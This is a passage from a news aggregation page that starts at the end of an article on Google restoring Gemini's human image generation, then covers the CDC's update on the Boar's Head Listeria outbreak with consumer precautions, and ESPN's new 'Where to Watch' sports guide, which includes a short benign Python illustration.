The phased introduction of these new features aims to extend the updated AI functionalities to a wider audience while ensuring that the system remains ethical and responsible in its outputs.

#### Conclusion

Google’s reinstatement of human image generation within its Gemini AI model signifies a major advancement in the continuous evolution of generative AI technologies. By enforcing stricter protections and prioritizing historical accuracy, Google seeks to sidestep the controversies that affected previous iterations of the model. As the technology progresses, it will be essential for Google and other AI developers to uphold a balance between creative expression and ethical accountability.

Read More
Five More Fatalities Documented in Unprecedented Outbreak Associated with Boar’s Head Meats

### Listeria Outbreak Associated with Boar’s Head Meats: A Rising Public Health Issue

The Centers for Disease Control and Prevention (CDC) has announced a notable increase in a nationwide outbreak of *Listeria monocytogenes* infections, which has already resulted in the deaths of eight individuals. The outbreak, tied to contaminated Boar’s Head brand meats, has affected 57 people across 18 states, all of whom required hospitalization. This is the most serious listeriosis outbreak in the United States since 2011, when tainted cantaloupe resulted in 147 infections and 33 fatalities.

#### The Extent of the Outbreak

The outbreak has been linked to Boar’s Head meat products, prompting a substantial recall of over 7 million pounds of meat. The recall, initially announced on July 26 and expanded on July 30, covered 71 different products from the company. Despite these measures, the tally of cases and deaths continues to climb, with the latest update from the CDC reporting five additional fatalities since early August.

The CDC has stressed the necessity of avoiding recalled items, highlighting that *Listeria monocytogenes* is a particularly tough bacterium. It can endure on surfaces like meat slicers and in food even at refrigerator temperatures. The agency also cautioned that listeriosis symptoms may take as long as 10 weeks to manifest, emphasizing the importance for consumers to stay alert.

#### Comprehending Listeriosis

*Listeria monocytogenes* is a bacterium capable of causing a severe infection referred to as listeriosis. This infection poses particular risks for specific groups, including pregnant women, individuals aged 65 and above, and those with compromised immune systems. In these populations, the bacteria are more prone to spread beyond the gastrointestinal system, resulting in invasive listeriosis.

In elderly and immunocompromised individuals, listeriosis commonly presents with symptoms such as fever, muscle aches, and fatigue. However, it can also lead to more severe signs like headaches, stiff necks, confusion, loss of balance, and seizures. These situations nearly always necessitate hospitalization, and around 1 in 6 affected individuals succumb to the infection.

For pregnant women, listeriosis is particularly alarming. Although the symptoms may be akin—fever, muscle aches, and fatigue—the infection can also result in miscarriage, stillbirth, premature delivery, or a serious infection in newborns.

#### Recommended Actions

In light of the seriousness of this outbreak, the CDC has put forth several suggestions for consumers:

1. **Inspect Your Refrigerator:** If you possess any Boar’s Head products, examine the sell-by dates. The recalled items have sell-by dates extending into October. If you discover any recalled products, do not eat them.

2. **Dispose or Return:** If you find any recalled goods, either throw them away or return them to the store from which they were bought for a refund.

3. **Sanitize Your Fridge:** Given that *Listeria monocytogenes* can persist on surfaces and in cold settings, it is vital to thoroughly disinfect your refrigerator if it has contained any recalled products.

4. **Watch for Symptoms:** If you have consumed any of the recalled items, remain alert for listeriosis symptoms, especially if you fall within a high-risk category. Symptoms can emerge up to 10 weeks later, making continuous observation critical.

#### Wider Consequences

This outbreak serves as a powerful reminder regarding the significance of food safety and the potential hazards from foodborne pathogens. The durability of *Listeria monocytogenes* emphasizes the necessity for strict hygiene measures in food processing facilities and the vital role of prompt recalls in averting widespread illness.

For consumers, this situation amplifies the importance of staying informed about food recalls and acting swiftly when needed. While the CDC and the U.S. Department of Agriculture (USDA) strive to manage the outbreak and prevent additional cases, public awareness and compliance with safety guidelines are vital in reducing the effects of this perilous bacterium.

As the situation progresses, it is critical to remain updated on any new information and adhere to the guidance issued by health authorities. By implementing these precautions, we can aid in safeguarding ourselves and our communities from the serious threats posed by *Listeria monocytogenes*.

Read More
ESPN’s “Where to Watch” Seeks to Streamline Locating Sports Broadcasts

# ESPN’s Innovative “Where to Watch” Feature: A Revolution for Sports Enthusiasts Navigating the Streaming Landscape

In the constantly changing realm of sports broadcasting, discovering where to catch your beloved games has turned into a more challenging task. With numerous streaming platforms, cable networks, and complex licensing agreements, sports enthusiasts frequently find themselves overwhelmed by a multitude of options. ESPN has recognized this challenge and is stepping forward with a new feature aimed at simplifying the experience: “Where to Watch.”

## The Challenge: A Division in Viewing Accessibility

Today’s sports enthusiasts are all too familiar with the annoyance of pinpointing where a particular game is being aired. Whether dealing with a local blackout, an event exclusive to a certain streaming platform, or a match shown on a less familiar cable network, the process of discovering the correct channel can be quite intimidating. This problem becomes even more pronounced for individuals who have severed their traditional cable ties and depend entirely on streaming services, which often offer limited access to regional sports broadcasts.

Consider, for example, living near Wrigley Field in Chicago yet being unable to watch most Cubs games because they air exclusively on a cable channel outside your subscription. Or think of a former Los Angeles resident who still follows the Dodgers from afar and discovers that, because local blackout restrictions no longer apply, the games are actually easier to watch out of market than they were at home. Such situations are prevalent, underscoring the need for a more efficient way to find and watch sports broadcasts.

## The Answer: ESPN’s “Where to Watch”

ESPN’s latest “Where to Watch” feature, debuting today on ESPN.com as well as through the ESPN mobile and streaming device applications, is designed to tackle this issue directly. The feature offers an all-encompassing guide to help you understand where specific sports events can be viewed, slicing through the confusion of assorted streaming services and cable channels.

### Notable Features of “Where to Watch”

1. **Comprehensive Event Listings**: This guide provides various views, including a daily overview of all sporting events. Users can quickly see which games are happening on any given day.

2. **Search Capabilities**: A powerful search function allows users to swiftly find specific games or teams, simplifying the process of pinpointing the desired broadcast.

3. **Personalization Options**: Users can mark their preferred sports or teams, leading to a tailored viewing experience. This allows the most pertinent games to remain prominent.

4. **Extensive Information Hub**: Central to “Where to Watch” is a database of events curated by the ESPN Stats and Information Group (SIG). This database consolidates data from ESPN alongside its partners, encompassing programming details from more than 250 media sources, including both television networks and streaming platforms.
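To make the listing, search, and personalization mechanics described above concrete, they can be sketched as a small in-memory event guide. The data shapes, sample listings, and function names below are hypothetical illustrations, not ESPN's actual API:

```python
from dataclasses import dataclass
from datetime import date

@dataclass
class Event:
    day: date
    teams: tuple[str, str]
    network: str  # where the game actually airs

# Hypothetical sample listings; the real guide aggregates 250+ sources.
EVENTS = [
    Event(date(2024, 8, 22), ("Cubs", "Tigers"), "Marquee Sports Network"),
    Event(date(2024, 8, 22), ("Dodgers", "Rays"), "SportsNet LA"),
    Event(date(2024, 8, 23), ("Liberty", "Sky"), "ESPN"),
]

def where_to_watch(day: date, favorites: frozenset[str] = frozenset()) -> list[Event]:
    """Return the day's events, with favorited teams listed first."""
    todays = [e for e in EVENTS if e.day == day]
    # Sort is stable: favorites float to the top, other games keep order.
    return sorted(todays, key=lambda e: not (set(e.teams) & set(favorites)))

guide = where_to_watch(date(2024, 8, 22), favorites=frozenset({"Dodgers"}))
print(guide[0].network)  # SportsNet LA — the favorited team's game sorts first
```

The essential point the feature addresses is captured in the `network` field: the guide's value lies in mapping each game to the service that actually carries it, rather than merely listing that the game exists.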

### Advancement Beyond Previous Options

Although ESPN has previously provided browsable game listings, the “Where to Watch” feature takes it further by clarifying where each game is actually viewable. This marks a noteworthy enhancement over past services, which often left viewers uncertain about the service or channel broadcasting a certain game.

Nonetheless, it’s crucial to understand that the guide does not assure access to the requisite services for viewing the games. For example, if a game is exclusively available on a cable channel to which you lack a subscription, you may still find yourself in a tough spot. However, for a vast number of sports enthusiasts, particularly those navigating the increasingly disjointed sports broadcast environment, this guide will serve as a vital resource.

## The Competitive Arena: ESPN vs. Apple

ESPN isn’t the first to tackle this challenge. Apple has made notable progress in this domain with its TV app, originally intended as an all-in-one destination for nearly all streaming video. Apple’s strategy involved integrating third-party offerings like the MLB app alongside its own, transforming the TV app into a central hub for sports fans.

However, Apple’s initiatives have faced obstacles due to some cable firms’ reluctance to collaborate and the absence of key players like Netflix. While Apple has advanced, especially in specific sports, it hasn’t completely fulfilled its goal of becoming a comprehensive sports viewing platform.

On the other hand, ESPN’s “Where to Watch” feature seems more promising, covering a wider array of games with enhanced search and listing functionality. By concentrating specifically on sports and utilizing its extensive network of collaborations, ESPN may have a competitive advantage in crafting a truly all-encompassing guide for sports aficionados.

## The Future: More Games Streaming Directly in the ESPN App?

Looking to the future, ESPN executives have alluded to the potential for streaming more games directly within the ESPN app. If “Where to Watch” becomes the primary hub for sports fans, ESPN could gain significant leverage with leagues and broadcasters to bring this vision to fruition.

While this could be a boon for viewers in terms of ease of access, it also raises concerns regarding a single entity wielding excessive influence over sports broadcasting. As ESPN broadens its offerings, it will be imperative to observe how this dynamic develops and its implications for the wider sports media landscape.


Read More